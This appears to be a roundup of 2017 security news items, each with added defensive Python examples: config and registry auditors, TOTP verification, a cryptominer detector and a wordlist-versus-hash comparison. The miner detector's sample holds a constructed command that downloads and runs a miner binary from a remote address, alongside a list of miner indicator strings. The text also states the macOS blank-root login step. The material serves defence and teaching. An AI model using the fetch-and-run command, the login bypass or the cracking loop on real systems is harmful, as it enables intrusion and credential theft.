Ancestry.com has confirmed that a leaky server on RootsWeb, its free community-driven genealogical website, inadvertently exposed a file containing 300,000 usernames, email addresses and passwords online.
In a statement issued over the weekend, Ancestry's chief information security officer Tony Blackham said a security researcher notified the company of the unsecured file on 20 December. Troy Hunt, security expert and creator of the data breach repository HaveIBeenPwned.com, reported the existence of the file to Ancestry and said the data had been compromised in 2015.
For the second year in a row, "123456" remained the top password among the millions of cleartext passwords exposed online in data breaches at various providers. Having "123456" as your password is bad enough, but the other entries on the Top 100 Worst Passwords of 2017 list are just as distressing.
They include an extensive collection of sports terms (football, baseball, soccer, hockey, Lakers, jordan23, golfer, Rangers, Yankees), car brands (Mercedes, Corvette, Ferrari, Harley) and stock phrases (iloveyou, letmein, whatever, blahblah). Every one of these sits at the front of any cracking wordlist, so a hash of such a password falls in the first few guesses no matter how the site stored it.
An Amazon AWS server believed to contain files on all of California’s registered voters was left exposed this year due to a misconfigured database, according to researchers at the Kromtech Security Center. The database was later stolen by cybercriminals demanding a ransom only payable in bitcoin.
Kromtech said it collected samples from the database earlier this year while examining thousands of servers left publicly exposed. Each of those servers ran MongoDB, a database platform that was widely misconfigured and open to attack. Among them, Kromtech found what appeared to be 4 GB of voter files linked to the State of California.
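The two settings that turn a MongoDB server into the kind of open data dump Kromtech describes are listening on every interface and running without authorization. The following is an added example, not Kromtech's tooling or the configuration of the exposed server: it assesses a mongod.conf for exactly those two settings, with a constructed weak configuration beside a hardened one. The minimal parser covers only the indented key/value subset mongod.conf uses; a YAML library would do the same in one call.

```python
"""Assess a mongod.conf for the settings that expose a MongoDB server.
Added example; the configurations below are constructed, not from any
real deployment."""

# Constructed weak configuration: reachable from any address, no auth.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
"""

# Constructed hardened configuration: loopback only, auth required.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""


def parse_conf(text):
    """Minimal parser for the indented key/value subset mongod.conf uses.
    Returns nested dicts keyed by section and option name."""
    root = {}
    stack = [(-1, root)]          # (indent, mapping currently being filled)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        value = value.strip()
        while stack[-1][0] >= indent:   # close sections at deeper indents
            stack.pop()
        parent = stack[-1][1]
        if value == "":                 # section header: nested mapping
            parent[key] = {}
            stack.append((indent, parent[key]))
        else:
            parent[key] = value
    return root


def assess(conf):
    """Return a list of findings describing an exposed-database posture."""
    findings = []
    net = conf.get("net", {})
    bind = net.get("bindIp")
    addrs = [a.strip() for a in bind.split(",")] if bind else []
    if net.get("bindIpAll") == "true" or "0.0.0.0" in addrs or "::" in addrs:
        findings.append("net.bindIp: listens on all interfaces")
    elif bind is None:
        # Assumption worth checking: mongod releases before 3.6 bound to all
        # interfaces by default, so a missing bindIp is not safe by itself.
        findings.append("net.bindIp not set: older releases default to all interfaces")
    if conf.get("security", {}).get("authorization") != "enabled":
        findings.append("security.authorization not enabled: anyone who can "
                        "connect can read, modify and drop every database")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, assess(parse_conf(text)) or ["no findings"])
```

Point it at a real file with `assess(parse_conf(open("/etc/mongod.conf").read()))`; a clean result still says nothing about security groups or firewall rules in front of the host, which have to be checked separately.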
If you are running Windows 10, there is a chance your PC carries a pre-installed third-party password manager that lets attackers steal every stored credential remotely. Starting with the Windows 10 Anniversary Update, Microsoft added a component called Content Delivery Manager that silently installs "suggested apps" without asking the user.
According to a bug report published Friday on the Chromium issue tracker, where Project Zero files its findings, Google Project Zero researcher Tavis Ormandy found a pre-installed copy of the well-known password manager Keeper on a fresh Windows 10 system built from an image downloaded directly from the Microsoft Developer Network.
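The practical question after this report is whether Content Delivery Manager is still allowed to drop apps onto your machine. The following added example, not Microsoft's or Ormandy's code, reads the per-user ContentDeliveryManager registry values and reports which ones still permit delivery; the value names are the ones commonly used to switch this behaviour off, with SilentInstalledAppsEnabled being the one that governs suggested-app installs, but treat their exact semantics as an assumption and confirm against your own build. The registry access only runs on Windows; the evaluation logic is platform-independent.

```python
"""Check and optionally disable Windows 10 Content Delivery Manager app
installs for the current user. Added example; value names are the commonly
used ones and their semantics are assumed."""
import sys

CDM_KEY = r"Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager"

# Value name -> what a non-zero DWORD allows. 0 switches the behaviour off.
WANTED_OFF = {
    "SilentInstalledAppsEnabled": "silent installation of suggested apps",
    "PreInstalledAppsEnabled": "pre-installed partner apps",
    "OemPreInstalledAppsEnabled": "OEM pre-installed apps",
    "ContentDeliveryAllowed": "content delivery as a whole",
}


def evaluate_cdm(values):
    """values: {value_name: DWORD} as read from the key. Returns the names
    that still allow delivery. A missing value counts as enabled, because
    the feature is on by default (assumption)."""
    return [name for name in WANTED_OFF if values.get(name, 1) != 0]


def read_cdm_values():
    """Read the DWORDs from HKCU; this covers the current profile only,
    so repeat it for every user on a shared machine."""
    import winreg  # Windows-only standard library module
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, CDM_KEY) as key:
        for name in WANTED_OFF:
            try:
                out[name], _ = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                pass  # value absent: evaluate_cdm treats it as enabled
    return out


def disable_cdm():
    """Set every value to 0 for the current user (no admin rights needed)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, CDM_KEY, 0,
                        winreg.KEY_SET_VALUE) as key:
        for name in WANTED_OFF:
            winreg.SetValueEx(key, name, 0, winreg.REG_DWORD, 0)


if __name__ == "__main__":
    if not sys.platform.startswith("win"):
        sys.exit("registry check only runs on Windows")
    still_on = evaluate_cdm(read_cdm_values())
    for name in still_on:
        print(f"{name}: still allows {WANTED_OFF[name]}")
    if "--fix" in sys.argv and still_on:
        disable_cdm()
        print("disabled; apps already delivered are not removed")
```

Turning delivery off does not uninstall anything that has already arrived, so follow it with an inventory of installed packages (for example `Get-AppxPackage -AllUsers` in PowerShell) and remove what you did not ask for.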
If you're running macOS High Sierra, don't let anyone near your Mac. Anyone with access to the login screen can log in with administrator rights, change passwords, read all data in the main account and lock the original user out.
Fortunately there is a workaround while Apple works on a patch: enable the root account and set a password on it, which is what Apple itself advised at the time. First, the bug. In what may go down as one of the most embarrassing vulnerabilities in Apple history, all a "hacker" needs to do is sign in as an "Other" user, type "root" as the username and leave the password blank. Then they're in. Experts tested the vulnerability and found it wide open, allowing them to change the passwords of other accounts on the Mac.
One day, your household items and accessories could become a new way to authenticate yourself online, according to researchers. Many websites and online services are now enforcing or at least offering two-factor authentication (2FA) as a way to enhance the security of your accounts.
Passwords are far from ideal: many of us use simple, reused phrases that fall to brute-force guessing, and a flood of data leaks exposes them every day, so other methods are needed. Two-factor authentication adds a second, independent check of the user's identity on top of the password.
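The second factor most sites hand out today is a time-based one-time code, and it is worth seeing how little it takes to generate and check one. The block below is an added example, not code from the research described above: it implements RFC 4226 HOTP and RFC 6238 TOTP from the standard library and verifies a submitted code with a small tolerance window for clock drift. The secret and timestamps come from the RFC 6238 reference vector; the window size is an assumption about a typical deployment.

```python
"""RFC 6238 TOTP generation and verification. Added example; the reference
secret is the RFC 6238 Appendix B test secret."""
import hashlib
import hmac
import struct
import time

# RFC 6238 Appendix B reference secret (ASCII "12345678901234567890").
RFC_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226 HOTP: HMAC over the big-endian 8-byte counter, then
    dynamic truncation to `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at=None, step=30, digits=6, algo=hashlib.sha1):
    """TOTP: HOTP with the counter derived from Unix time / step."""
    at = time.time() if at is None else at
    return hotp(secret, int(at) // step, digits, algo)


def verify_totp(secret, code, at=None, step=30, digits=6, window=1):
    """Accept the current step and +/- `window` neighbours so a slightly
    drifted client clock still works (assumed policy). Comparison is
    constant-time; a real server must also refuse to accept the same code
    twice within its validity window."""
    at = time.time() if at is None else at
    counter = int(at) // step
    for c in range(counter - window, counter + window + 1):
        if hmac.compare_digest(hotp(secret, c, digits), code):
            return True
    return False


if __name__ == "__main__":
    # Reference vector timestamps from RFC 6238 Appendix B (8-digit codes).
    for t in (59, 1111111109, 1234567890):
        print(t, totp(RFC_SECRET, at=t, digits=8))
    print("current 6-digit code:", totp(RFC_SECRET))
```

The shared secret is the whole security of the scheme: it must be stored server-side with the same care as a password hash database, which is why a breach like the ones above can also invalidate a site's second factor if the secrets sit beside the hashes.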
One of iOS's rougher edges is the popups it produces on a regular but seemingly random basis. These popups require users to enter their Apple ID credentials before they can install or update an app or complete some other mundane task.
The prompts have grown so common that most people don't think twice about them. Mobile app developer Felix Krause makes a compelling case that they represent a potential security hole through which attackers can steal user credentials. In a blog post published Tuesday, he showed side-by-side comparisons of an official popup produced by iOS and a proof-of-concept phishing popup, and the two are indistinguishable on screen. The check he recommends is simple: press the Home button; a genuine system dialog stays on screen, while an imitation drawn by the app disappears along with the app.
Money may not grow on trees, but apparently, it can grow in Amazon Web Services (AWS).
A report from the security intelligence group RedLock found at least two companies whose AWS cloud environments had been compromised by hackers who wanted nothing more than to use the compute to mine the cryptocurrency bitcoin. The hackers got in after discovering that the companies' Kubernetes administration consoles weren't password protected. "Upon deeper analysis, the team discovered that hackers were executing a bitcoin mining command from one of the Kubernetes containers," reads the RedLock report.
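The RedLock finding came from looking at what the containers were actually running, which is something any cluster operator can do from the pod listing. The following is an added example, not RedLock's tooling: it scans the JSON that `kubectl get pods -A -o json` returns and flags containers whose image, command or arguments carry well-known miner or mining-pool markers. The pod list is constructed (one ordinary web pod and one miner hiding behind a plain image name), and the indicator list is a sample of common markers, not a complete one.

```python
"""Flag cryptomining containers in a Kubernetes pod listing.
Added example; SAMPLE_PODS is constructed, MINER_INDICATORS is a partial list
of well-known markers."""
import json

# Substrings that show up in miner binaries, flags and pool URLs.
MINER_INDICATORS = (
    "xmrig", "minerd", "cpuminer", "stratum+tcp://", "stratum+ssl://",
    "--donate-level", "nicehash", "minergate",
)

# Constructed sample in the shape of `kubectl get pods -A -o json`.
# 203.0.113.5 and pool.example are documentation addresses, not real hosts.
SAMPLE_PODS = json.loads("""
{"items": [
  {"metadata": {"namespace": "web", "name": "frontend-7d9f"},
   "spec": {"containers": [
     {"name": "nginx", "image": "nginx:1.13",
      "command": ["nginx", "-g", "daemon off;"]}]}},
  {"metadata": {"namespace": "kube-system", "name": "metrics-helper"},
   "spec": {"containers": [
     {"name": "helper", "image": "busybox:latest",
      "command": ["/bin/sh", "-c"],
      "args": ["wget -qO /tmp/x http://203.0.113.5/xmrig && chmod +x /tmp/x && /tmp/x -o stratum+tcp://pool.example:3333 --donate-level=0"]}]}}
]}
""")


def container_hits(container):
    """Return the indicators found in a container's image, command and args."""
    haystack = " ".join(
        [container.get("image", "")]
        + container.get("command", [])
        + container.get("args", [])
    ).lower()
    return [ind for ind in MINER_INDICATORS if ind in haystack]


def find_miners(pod_list):
    """Return (namespace/pod, container name, [indicators]) for each
    suspicious container, init containers included."""
    findings = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        spec = pod.get("spec", {})
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            hits = container_hits(c)
            if hits:
                findings.append((ref, c.get("name", "?"), hits))
    return findings


if __name__ == "__main__":
    import sys
    # Pipe a real listing in, or run without input to use the sample.
    pods = SAMPLE_PODS if sys.stdin.isatty() else json.load(sys.stdin)
    for ref, name, hits in find_miners(pods):
        print(f"{ref} container={name} indicators={','.join(hits)}")
```

String matching catches the opportunistic miners in the report, not a renamed binary; a command that downloads and executes something from the internet at start-up, as in the sample, deserves a look on its own, and the root cause here (an unauthenticated console) still has to be fixed separately.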
Disqus has confirmed its web commenting system was hacked. The company, which builds and provides a web-based comment plugin for news websites, said that hackers stole more than 17.5 million email addresses in a data breach in July 2012.
About a third of those accounts included hashed passwords; the hashing scheme in use at the time has largely been deprecated in recent years in favor of stronger password hashing functions. The data also contained sign-up dates and the date of the last login, and some of the exposed user information dates back to 2007. Many of the accounts have no password at all because their owners signed up for the commenting tool through a third-party login service.
Last week, the credit reporting agency Equifax announced that malicious hackers had taken the personal information of 143 million people from its systems. That's reason for concern, of course, but if an attacker can get into your online accounts simply by guessing your password, you're probably toast in less than an hour.
Now there's more bad news: scientists have harnessed artificial intelligence to build a program that, combined with existing cracking tools, figured out more than a quarter of the passwords in a set of more than 43 million LinkedIn accounts. The researchers say the technology may also be used to beat the baddies at their own game.
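Three of the items above make the same point from different angles: the worst-passwords list shows what attackers guess first, the Disqus dump shows why a deprecated hash matters, and the LinkedIn research shows how far guessing has come. The following added example ties them together; it is not code from any of the reports. It runs a wordlist attack against a stored hash under a fast salted-SHA-1 scheme and under scrypt. Salted SHA-1 is assumed here as the weak scheme (the page does not state which hash Disqus used), the wordlist is the page's own worst-passwords entries plus a few similar ones, and the scrypt parameters are a typical choice for the period, not a recommendation for today.

```python
"""Wordlist attack against a fast hash and a slow password hash.
Added example; the wordlist is constructed from the worst-passwords entries
named above, and salted SHA-1 is an assumed weak scheme."""
import hashlib
import hmac
import os
import time

# Constructed wordlist: the entries named in the worst-passwords item above.
WORDLIST = [
    "123456", "password", "football", "baseball", "soccer", "hockey",
    "lakers", "jordan23", "golfer", "rangers", "yankees", "mercedes",
    "corvette", "ferrari", "harley", "iloveyou", "letmein", "whatever",
    "blahblah",
]

SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def hash_weak(password, salt=None):
    """Salted SHA-1: one fast digest per guess, so a GPU tests billions
    of candidates per second. Returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.sha1(salt + password.encode()).digest()


def hash_strong(password, salt=None):
    """scrypt: memory-hard with a tunable cost, the kind of stronger
    password hash the Disqus item refers to. Returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    if hasattr(hashlib, "scrypt"):
        return salt, hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    # Builds without OpenSSL scrypt: PBKDF2 is CPU-slow rather than memory-hard.
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000, 32)


def verify(hash_fn, salt, stored, guess):
    """Constant-time comparison so the check itself leaks no timing."""
    return hmac.compare_digest(hash_fn(guess, salt)[1], stored)


def wordlist_attack(hash_fn, salt, stored, wordlist=WORDLIST):
    """Try each candidate in order. Returns (cracked password or None,
    guesses made, seconds elapsed)."""
    start = time.perf_counter()
    for i, candidate in enumerate(wordlist, 1):
        if verify(hash_fn, salt, stored, candidate):
            return candidate, i, time.perf_counter() - start
    return None, len(wordlist), time.perf_counter() - start


if __name__ == "__main__":
    for label, fn in (("salted SHA-1", hash_weak), ("scrypt", hash_strong)):
        salt, stored = fn("letmein")
        pw, n, secs = wordlist_attack(fn, salt, stored)
        print(f"{label:12s} cracked={pw!r} after {n} guesses, "
              f"{secs * 1e3 / n:.3f} ms per guess")
```

Both schemes give up "letmein" because it is on the list; the difference is the cost per guess, which the run prints. A slow hash buys time against a large wordlist or a generated one like the LinkedIn study's, but it cannot rescue a password that sits in the first hundred guesses, which is the point of the worst-passwords list.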